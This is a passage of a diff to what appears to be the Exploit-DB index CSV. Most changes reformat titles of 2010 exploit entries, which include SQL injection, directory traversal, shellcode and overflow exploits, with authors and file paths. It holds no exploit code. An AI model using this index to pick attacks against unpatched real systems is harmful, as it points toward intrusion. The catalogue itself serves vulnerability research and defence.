15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0 15042,platforms/windows/remote/15042.py,"MOAUB #19 - Novell iPrint Client Browser Plugin call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 -15044,platforms/asp/webapps/15044.txt,"MOAUB #19 - JMD-CMS Multiple Remote Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 +15044,platforms/asp/webapps/15044.txt,"moaub #19 - jmd-cms Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 -15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 Directory Traversal Vulnerability",2010-09-19,sqlhacker,windows,remote,0 +15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal vulnerability",2010-09-19,sqlhacker,windows,remote,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 Buffer Overflow Proof Of Concept",2010-09-19,The_UnKn@wn,linux,dos,0 15056,platforms/windows/remote/15056.py,"MOAUB #20 - Java CMM readMabCurveData Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15058,platforms/asp/webapps/15058.html,"MOAUB #20 - VWD-CMS CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 -15060,platforms/php/webapps/15060.txt,"LightNEasy Cms 3.2.1 Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 -15061,platforms/windows/dos/15061.txt,"Microsoft DRM Technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities",2010-09-20,"Asheesh Kumar Mani Tripathi",windows,dos,0 -15062,platforms/linux/dos/15062.txt,"RarCrack v0.2 ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0 +15060,platforms/php/webapps/15060.txt,"LightNEasy Cms 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 +15061,platforms/windows/dos/15061.txt,"microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities",2010-09-20,"Asheesh Kumar Mani Tripathi",windows,dos,0 +15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0 15063,platforms/windows/shellcode/15063.c,"win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes",2010-09-20,ZoRLu,windows,shellcode,0 -15064,platforms/php/webapps/15064.txt,"Primitive CMS 1.0.9 Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 +15064,platforms/php/webapps/15064.txt,"primitive cms 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 15065,platforms/windows/dos/15065.txt,"MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 15067,platforms/asp/webapps/15067.txt,"MOAUB #21 - Personal.Net Portal Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) Heap Overflow(.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 @@ -13120,9 +13118,9 @@ id,file,description,date,author,platform,type,port 15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0 15086,platforms/multiple/dos/15086.py,"MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0 15088,platforms/windows/dos/15088.txt,"MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0 -15090,platforms/php/webapps/15090.txt,"WAnewsletter v 2.1.2 SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0 +15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection Vulnerability",2010-09-23,Gamoscu,php,webapps,0 -15092,platforms/php/webapps/15092.txt,"OvBB v0.16a Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 +15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 15094,platforms/windows/local/15094.py,"MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15096,platforms/windows/dos/15096.py,"MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 @@ -13137,10 +13135,10 @@ id,file,description,date,author,platform,type,port 15112,platforms/windows/dos/15112.py,"MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow",2010-09-26,Abysssec,windows,dos,0 15114,platforms/php/webapps/15114.php,"MOAUB #26 - Zenphoto Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 -15118,platforms/asp/webapps/15118.txt,"Gokhun ASP Stok 1.0 - Multiple Remote Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 +15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 SQL Injection Vulnerability",2010-09-26,KnocKout,php,webapps,0 15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS Directory Traversal",2010-09-26,mr_me,cfm,webapps,0 -15121,platforms/php/webapps/15121.txt,"PBBoard 2.1.1 Multiple Remote Vulnerabilities",2010-09-27,JiKo,php,webapps,0 +15121,platforms/php/webapps/15121.txt,"pbboard 2.1.1 Multiple Vulnerabilities",2010-09-27,JiKo,php,webapps,0 15122,platforms/windows/dos/15122.html,"MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 15124,platforms/asp/webapps/15124.txt,"MOAUB #27 - ndCMS Sql Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0 15126,platforms/php/webapps/15126.txt,"Entrans SQL Injection Vulnerablility",2010-09-27,keracker,php,webapps,0 @@ -13148,12 +13146,12 @@ id,file,description,date,author,platform,type,port 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability",2010-09-27,4n0nym0us,windows,dos,0 15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh exploit",2010-09-27,"sanjeev gupta",windows,local,0 -15134,platforms/windows/local/15134.rb,"Digital Music Pad Version 8.2.3.3.4 SEH overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 +15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 15139,platforms/asp/webapps/15139.txt,"MOAUB #28 - AtomatiCMS Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0 15141,platforms/php/webapps/15141.txt,"MOAUB #28 - JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0 -15143,platforms/php/webapps/15143.txt,"e107 v0.7.23 SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0 +15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQLi) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0 @@ -13166,22 +13164,22 @@ id,file,description,date,author,platform,type,port 15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 (id) Remote SQL Injection Vuln",2010-09-29,"BorN To K!LL",php,webapps,0 15155,platforms/linux/local/15155.c,"XFS Deleted Inode Local Information Disclosure Vulnerability",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 -15157,platforms/php/webapps/15157.txt,"JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 +15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15158,platforms/windows/dos/15158.py,"MOAUB #30 - Microsoft Unicode Scripts Processor Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 15160,platforms/asp/webapps/15160.txt,"MOAUB #30 - ASPMass Shopping Cart Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0 -15165,platforms/php/webapps/15165.txt,"Zen Cart 1.3.9f - Multiple Remote Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 +15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,Kingcope,windows,dos,0 15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution (MSF)",2010-10-01,Trancer,windows,remote,0 15169,platforms/php/webapps/15169.txt,"Evaria Content Management System 1.1 File Disclosure Vulnerability",2010-10-01,"khayeye shotor",php,webapps,0 15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 -15174,platforms/php/webapps/15174.txt,"Tiki Wiki CMS Groupware 5.2 Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 +15174,platforms/php/webapps/15174.txt,"tiki wiki cms groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 -15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 Blind SQL Injection",2010-10-01,plucky,php,webapps,0 +15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 @@ -13214,8 +13212,8 @@ id,file,description,date,author,platform,type,port 15220,platforms/php/webapps/15220.txt,"Flex Timesheet Authentication Bypass Vulnerability",2010-10-08,KnocKout,php,webapps,0 15222,platforms/php/webapps/15222.txt,"Joomla Community Builder Enhenced (CBE) Component LFI/RCE Vulnerability",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame Multiple SQL Injection Vulnerabilities",2010-10-09,KnocKout,php,webapps,0 -15224,platforms/php/webapps/15224.txt,"JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 -15225,platforms/php/webapps/15225.txt,"VideoDB <= 3.0.3 Multiple Remote Vulnerabilities",2010-10-09,Valentin,php,webapps,0 +15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 +15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0 @@ -13226,14 +13224,14 @@ id,file,description,date,author,platform,type,port 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP exploit",2010-10-11,mr_me,windows,remote,0 15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 -15239,platforms/php/webapps/15239.html,"WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 -15240,platforms/php/webapps/15240.txt,"Collabtive v0.65 Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 +15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 +15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 15241,platforms/windows/remote/15241.txt,"Oracle Java 6 OBJECT tag ""launchjnlp""/""docbase"" Param Buffer Overflow Exploit",2010-10-13,SkyLined,windows,remote,0 15242,platforms/windows/dos/15242.html,"Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups",2010-10-13,SkyLined,windows,dos,0 15243,platforms/windows/dos/15243.html,"Oracle Java APPLET Tag Children Property Memory Corruption",2010-10-13,SkyLined,windows,dos,0 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 15245,platforms/solaris/local/15245.txt,"Oracle Solaris CVE-2010-3503 'su' Local Solaris Vulnerability",2010-10-13,prdelka,solaris,local,0 -15247,platforms/php/webapps/15247.txt,"Exponent CMS v0.97 Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps,0 +15247,platforms/php/webapps/15247.txt,"Exponent CMS 0.97 - Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps,0 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 15249,platforms/php/webapps/15249.txt,"Data/File upload and management Arbitrary File Upload Vulnerability",2010-10-14,saudi0hacker,php,webapps,0 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service Vulnerability",2010-10-14,Sweet,windows,dos,0 @@ -13262,7 +13260,7 @@ id,file,description,date,author,platform,type,port 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 .ogg Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 -15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0 +15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0 15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class – Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 @@ -13273,7 +13271,7 @@ id,file,description,date,author,platform,type,port 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave player rcsL chunk memory corruption 0day",2010-10-21,Abysssec,windows,remote,0 15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 and 6.5 Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 -15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0 +15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0 15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0 15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0 15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability",2010-10-22,"Tavis Ormandy",linux,local,0 @@ -13297,7 +13295,7 @@ id,file,description,date,author,platform,type,port 15323,platforms/php/webapps/15323.txt,"DZCP (deV!Lz Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15325,platforms/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15326,platforms/php/webapps/15326.txt,"BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15326,platforms/php/webapps/15326.txt,"BloofoxCMS 0.3.5 - Information Disclosure Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15327,platforms/php/webapps/15327.txt,"Energine CMS SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15328,platforms/php/webapps/15328.txt,"BloofoxCMS Registration Plugin SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15329,platforms/php/webapps/15329.txt,"Zomplog 3.9 - CSRF Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -13306,11 +13304,11 @@ id,file,description,date,author,platform,type,port 15332,platforms/php/webapps/15332.txt,"BlogBird Platform Multiple XSS Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15333,platforms/windows/remote/15333.txt,"MinaliC Webserver 1.0 - Directory Traversal Vulnerability",2010-10-27,"John Leitch",windows,remote,0 15334,platforms/windows/dos/15334.py,"MinaliC Webserver 1.0 - Denial of Service Vulnerability",2010-10-27,"John Leitch",windows,dos,0 -15335,platforms/php/webapps/15335.txt,"AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 +15335,platforms/php/webapps/15335.txt,"alstrasoft e-friends 4.96 Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 Buffer Overflow Exploit",2010-10-27,Blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0 -15340,platforms/php/webapps/15340.txt,"MyCart 2.0 Multiple Remote Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 +15340,platforms/php/webapps/15340.txt,"mycart 2.0 Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15341,platforms/multiple/dos/15341.html,"Firefox Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 15342,platforms/multiple/dos/15342.html,"Firefox Memory Corruption Proof of Concept (Simplified)",2010-10-28,"exploit dev",multiple,dos,0 15343,platforms/php/webapps/15343.php,"RoSPORA <= 1.5.0 Remote PHP Code Injection",2010-10-28,EgiX,php,webapps,0 @@ -13336,13 +13334,13 @@ id,file,description,date,author,platform,type,port 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Remote Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 15369,platforms/php/webapps/15369.php,"Auto CMS <= 1.8 Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 15370,platforms/php/webapps/15370.txt,"XAMPP <= 1.7.3 multiple vulnerabilites",2010-11-01,TheLeader,php,webapps,0 -15371,platforms/windows/remote/15371.txt,"Yaws 1.89 Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 -15373,platforms/windows/remote/15373.txt,"Mongoose Web Server 2.11 Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 +15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal vulnerability",2010-11-01,nitr0us,windows,remote,0 +15373,platforms/windows/remote/15373.txt,"mongoose web server 2.11 - Directory Traversal vulnerability",2010-11-01,nitr0us,windows,remote,0 15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 0day Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0 -15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect ""*.SQL"" Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 +15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - ""*.SQL"" Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 Denial of Service Vulnerability",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive SQL Injection Vulnerability",2010-11-01,"Anatolia Security",php,webapps,0 -15382,platforms/asp/webapps/15382.txt,"Douran Portal <= 3.9.7.55 - Multiple Remote Vulnerabilities",2010-11-01,ItSecTeam,asp,webapps,0 +15382,platforms/asp/webapps/15382.txt,"douran portal <= 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ItSecTeam,asp,webapps,0 15383,platforms/windows/dos/15383.c,"Rising RSNTGDI.sys Local Denial of Service Vulnerability",2010-11-02,ze0r,windows,dos,0 15384,platforms/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service Exploit",2010-11-02,"Nikita Tarakanov",windows,dos,0 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0 @@ -13365,10 +13363,10 @@ id,file,description,date,author,platform,type,port 15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite NtCreateKey Race Condition Vulnerability",2010-11-03,"Nikita Tarakanov",windows,dos,0 15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability",2010-11-03,"Matthew Bergin",windows,dos,0 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h Local File Inclusion Vulnerability",2010-11-03,"Salvatore Fresta",php,webapps,0 -15411,platforms/windows/dos/15411.pl,"HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability",2010-11-04,anT!-Tr0J4n,windows,dos,0 -15412,platforms/php/webapps/15412.txt,"eoCMS 0.9.04 Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 -15413,platforms/php/webapps/15413.txt,"SweetRice CMS 0.6.7 Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 -15414,platforms/php/webapps/15414.txt,"JAF CMS 4.0 RC2 Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 +15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - (.hta) Buffer Overflow Vulnerability",2010-11-04,anT!-Tr0J4n,windows,dos,0 +15412,platforms/php/webapps/15412.txt,"eocms 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 +15413,platforms/php/webapps/15413.txt,"sweetrice cms 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 +15414,platforms/php/webapps/15414.txt,"jaf cms 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 SQL Injection Vulnerability",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15416,platforms/php/webapps/15416.txt,"JBI CMS SQL Injection Vulnerability",2010-11-04,Cru3l.b0y,php,webapps,0 15417,platforms/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability",2010-11-04,moigai,windows,local,0 @@ -13397,11 +13395,11 @@ id,file,description,date,author,platform,type,port 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 -15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 +15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 -15448,platforms/asp/webapps/15448.txt,"Pilot Cart 7.3 Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 +15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,Kingcope,linux,remote,0 -15450,platforms/windows/remote/15450.txt,"FileCOPA FTP Server 6.01 directory traversal",2010-11-07,"Pawel h0wl Wylecial",windows,remote,21 +15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel h0wl Wylecial",windows,remote,21 15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,altbta,php,webapps,0 @@ -13416,7 +13414,7 @@ id,file,description,date,author,platform,type,port 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis 